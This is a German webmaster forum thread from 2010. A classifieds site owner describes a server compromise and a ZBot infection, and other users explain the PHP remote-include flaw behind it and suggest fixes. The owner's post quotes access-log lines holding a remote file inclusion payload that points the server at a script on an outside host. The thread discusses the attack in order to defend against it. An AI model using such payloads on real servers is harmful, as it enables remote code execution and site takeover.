Hackerangiff auf Webprojekt seit letzter Woche dauerhaft ...

Beitrag von **euroexchange.de** » 20.04.2010, 13:03

Hallo @all.

Anfang der letzten Woche viel mir ein Codeschnippsel in meinem Kleinanzeigenmarkt auf. Hacker hatten in einigen meiner Javascripts Code eingebracht. Seit dem hatte ich Trojaner und Viren auf meinem Rechner die ich mittels Avira und Spybot letztendlich beseitigen konnte.

Ich habe die Logfiles ausgewertet und festgestellt, das Seitenaufrufe mit dem Anhängen verschiedener URL von mir fremden Seiten stattgefunden haben.

anon-66-113-99-30.ip.invalid - - [20/Apr/2010:11:02:55 +0200] "GET /detail.php?id=328%20%20//europe//index.php?_SERVER[DOCUMENT_ROOT]=https://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 200 18993 "-" "Mozilla/5.0"
anon-66-113-99-30.ip.invalid - - [20/Apr/2010:11:02:57 +0200] "GET //europe//index.php?_SERVER[DOCUMENT_ROOT]=https://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 302 211 "-" "Mozilla/5.0"

Ich denke, jemand hat versucht per Einschleusung einer Console die Kontrolle über meinen Server (2. Server bei Strato) zu erlangen, denn es wurden Dateien verändert ohne das dabei auch das Datum verändernt wurde.

Die Angriffe fanden meißt täglich vormittags nach 11:00 Uhr und in der Nacht nach 04:00 Uhr statt. Da ich aus der Nachtschicht komme konnte ich hier jeweils die Originalfiles aufspielen und das Problem so lösen.

Samstag und Sonntag gab es keine Angriffe und ich dachte bis eben, das ich das Problem gelöst hätte bis ich...

...beim Surfen mit Firefox (sicherste Zone eingestellt) die Meldung bekam, das ein Java-Addon deaktiviert werden sollte weil es für Sicherheitslücken bekannt sei. Ich sollte es deaktivieren und Firefox neu starten.

Ich habe mich dann schnell aus allen Fenstern abgemeldet und bemerkt, das meine Firewall ausgeschaltet wurde und auch der Virus wieder in meiner Seite war. Anschließend bekam ich die Meldung das eine Datei verändert wurde und mein Windows wurde runtergefahren ohne das ich eingreifen konnte.

Die Seite ist nun fast tot da sogut wie alle Suchmaschinenrankings vernichtet wurden. Die Besucherzahlen sind seit Sonntag abnehmend und von ca. 20.000 pro Tag auf ca. 1.000 pro Tag gefallen.

Gibt es hier evtl. Leidensgenossen die gerade ähnliches erlebt haben oder erleben ...

Viele Grüße

von **Anzeige von ABAKUS** »

Beitrag von **1337530** » 20.04.2010, 13:35

Die Meldung, dass ich ein firefox-Java-Addon deaktivieren soll, bekam ich auch. Aber nicht erst gestern.
Ist glaub ich schon ein paar Tage her.
Dabei handelte es sich um die Java Konsole aus Java6 Update 19. Da waren Sicherheitslücken gefunden worden und deshalb ist inziwschein Update 20 aktuell.

Das war ein ganz normaler Vorgang, dieses Deaktivieren des Java-Addons.

Beitrag von **euroexchange.de** » 20.04.2010, 13:42

133... Danke für den Hinweis.

Weil ich aus Sicherheitsgründen immer wieder die FTP-Passwörter verändert habe und die Dateien auf dem Server trotzdem umgeschrieben wurden, hatte ich irgendwann den Eindruck das mein eigener Computer der Hacker war. Ist aber wohl nicht so ...

Beitrag von **Abakus Gast** » 20.04.2010, 13:45

Dein Problem liegt auf dem Server= Strassendeckel

Beitrag von **whyte** » 20.04.2010, 13:59

GENAU! Wie wäre es, wenn du die Sicherheitslücke in deinen Skripten fixt oder uns wenigstens die Adresse sagst, damit wir da NICHT HINSURVEN anstatt die Viren und was auch immer nur von deinem PC zu löschen.

Man includiert eben nicht einfach alles blind in index.php oder detail.php.
Mach wenigstens vor dem include eine Abfrage, ob sich http oder ftp in dem String befinden - besser noch, ob die Datei auch lokal vorhanden ist.

Und Angriff kann man das nicht nennen, das ist sozusagen das Ausnutzen vorhandener Lücken in den Skripten.

Beitrag von **euroexchange.de** » 20.04.2010, 14:04

Es ist ein Win32.ZBot den ich mir immer wieder einfange. Avira erkennt diesen noch nicht aber Spybot greift zu Glück.

Der Virus wird in die common.js eingeschleußt und die rss.php wird komplett überschrieben so das sie nur noch ein Passwortfeld anzeigt.

Was meinst Du genau mit includiert? Ich habe einige Datenbankabfragen per php-include eingebunden. Meinst Du das?

Tut mir leid, aber Hackerangriffe und Sicherheitslücken sind für mich Neuland. Nicht jeder kommt als Sicherheitsexperte auf die Welt

und ich hoffe hier schnell lernen zu können und die Lücke dann umgehend zu schließen.

Beitrag von **whyte** » 20.04.2010, 14:13

Ein "include" läd PHP Dateien nach und führt sie aus.
Diese liegen normalerweise bei dir lokal aufm Server, da ist das auch ok und normal.

Aber wenn man nicht gescheit programmiert und die include Abfragen vorher filtert und der Server includes von fremden Servern zulässt, kann fremder Code ausgeführt werden.

guck mal, hier: https://www.server-wissen.de/index.php? ... ude#post10
hab ich deinen Fall genau beschrieben.

Beitrag von **euroexchange.de** » 20.04.2010, 14:41

@whyte

Ach Du schei...

Herzlichen Dank für Deinen Hinweis!

Ich weiß jetzt was ich zu tun habe und hoffe, das es mir schnell gelingt.

Beitrag von **euroexchange.de** » 20.04.2010, 17:16

Ich habe jetzt zunächst den Schreibzugriff für Scripte auf dem gesamten Webspace ausgeschaltet. Es sollte dem Angreifer also nicht mehr möglich sein per Include eine Konsole auf den Server aufzubringen.

Ob er das so gemacht hat ist natürlich die Frage.

Leider können nun auch Inserenten keine Bilder mehr hochladen. Hier muß ich mal schauen wie ich das bewerkstellige.

Beitrag von **euroexchange.de** » 20.04.2010, 17:56

Beitrag von **euroexchange.de** » 20.04.2010, 19:28

Beitrag von **whyte** » 21.04.2010, 07:43

Spiel ein altes Backup ein ...
Und repariere dort die inlcude Funktionen

Beitrag von **Synonym** » 21.04.2010, 08:01

Wie kommst Du eigentlich darauf, dass der andere die Daten von Dir hat? Ich sehe da nichts kopiertes, nur massig Ergebnisse von Suchmaschinen und Werbung. Und mit "zerschossen" meinst Du wohl den Datenbankfehler von gestern, der kann aber auch andere Gründe gehabt haben.

Beitrag von **euroexchange.de** » 21.04.2010, 09:58

Also wie ich darauf komme ist folgendes.

Das ist mein Suchergebnis:

Kral Fm | Kleinanzeigen
II►Kral Fm Inserate ansehen | kostenlos inserieren | kaufen und verkaufen; türkische kral fm, türkische kral club, türkische kral disco, kral fm radio, ...
www. euroexchange.de/search.php?do_search...kral+fm - Im Cache

Das ist das Suchergebnis vom Chauffeur ...

Kral FM
II►Kral Fm Inserate ansehen | kostenlos inserieren | kaufen und verkaufen; kral fm arabesk, radyolar kral fm, kralfm com tr, kral fm frekans, ...
www. chauffeurcenter.com/de-DE/go-0/Kral/FM - Im Cache

Das gilt für hunderte von Suchergebnissen ...

Beitrag von **e-fee** » 21.04.2010, 11:30

Scheiße, der hat ja sogar Inhalte mir mir auf seiner Seite ... und von Abakus! sogar den Thread hier!
->

Hackerangiff auf Webprojekt seit letzter Woche dauerhaft ... - ABAKUS
II►Kral Fm Inserate ansehen | kostenlos inserieren | kaufen und verkaufen; kral fm arabesk, radyolar kral fm, kralfm com tr, kral fm ...
https://www.abakus-internet-marketing.d ... 84151.html

Der gute Mensch hat halt eine Suchmaschine auf seiner Seite. Da auf diesen Unterseiten außer Werbung kaum Text ist, rutschen die Suchergebnisse bei Google ins Snippet.

Ursächlich hat die Seite also sicher nix mit 'nem Hackerangriff auf Dich zu tun, das ist eine andere Baustelle. Allerdings solltest Du Dir ein paar Gedanken machen, wenn er Dich damit aus den SERPs kegelt, dann ist Deine Seite zu schwach.